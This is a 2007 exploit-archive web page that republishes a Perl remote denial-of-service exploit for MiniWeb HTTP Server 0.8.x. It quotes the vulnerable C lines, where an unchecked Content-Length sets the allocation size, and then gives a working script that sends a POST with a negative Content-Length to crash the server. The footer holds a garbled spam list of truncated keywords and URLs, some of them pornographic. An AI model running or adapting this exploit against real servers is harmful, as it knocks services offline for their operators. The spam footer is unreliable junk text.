about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , MiniWeb Http Server 0.8.x Remote Denial of Service Exploit




2007-06-09 MiniWeb Http Server 0.8.x Remote Denial of Service Exploit
Rated as : High Risk

# MiniWeb Http Server 0.8.x Remote Denial of Service
# MiniWeb site http://sourceforge.net/projects/miniweb/
# Author: gbr
#
# Tested running the server under Windows XP SP2
#
# Description:
#
# The server doesn't do a sanity-check on 'Content-Length' value from POST
Header, allowing the attacker to control
# the allocation size and the position in the 'pucPayload' char pointer to
write.
# This could be used to trigger an exception.
#
#
# Vulnerable code - file http.c | lines 701-702 MiniWeb 0.8.1 | lines 704
- 705 MiniWeb 0.8.19
# ------------------------------------------
#
phsSocket->request.pucPayload=malloc(phsSocket->response.iContentLength+1);
#
phsSocket->request.pucPayload[phsSocket->response.iContentLength]=0;
# ------------------------------------------

#!/usr/bin/perl

use strict;
use warnings;
use IO::Socket;

my $host = shift || die "usage: perl $0 host [port]n";
my $port = shift || 80;

my $sock = new IO::Socket::INET(PeerAddr => $host, PeerPort =>
$port, PeerProto => 'tcp')
or die "error: $!n";

$sock->send("POST / HTTP/1.1rn");
$sock->send("Content-Length: -10rnrn");

$sock->close;

print "Exploitedn";
securitydot.net - 2007-06-09

Advertising

Copyright 2007, SecurityDot
Mon, 23 Nov 2009 20:49:51 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
naret.net. Chameleon Sexi movie Www.Indian vilm sex lo74l www.bcqq.c sexymuvis. Microsoft ramba www.tmd38. angelina WWW.six 98 www.qianji xoopsgalle www.sexxx. Wap.trick. www.babaru iicozezofa free.six SEX5G.COM 101 boys ProFTPD 1. www.tjbuxi www.omniba php news r Wap.sex la www.nsip.c Saniya mir gbook.php% sexIndian ww.dt987.c www.52wenz CMS is Fre VIDEO DOWN www.thrsha Wap.sex la Www HOT SE nude amil Sextrailer the secret www.best-e Crack /r/n www.szpkub http://www Strings IP www.indiah WWWWORLDSE Word www.sexy g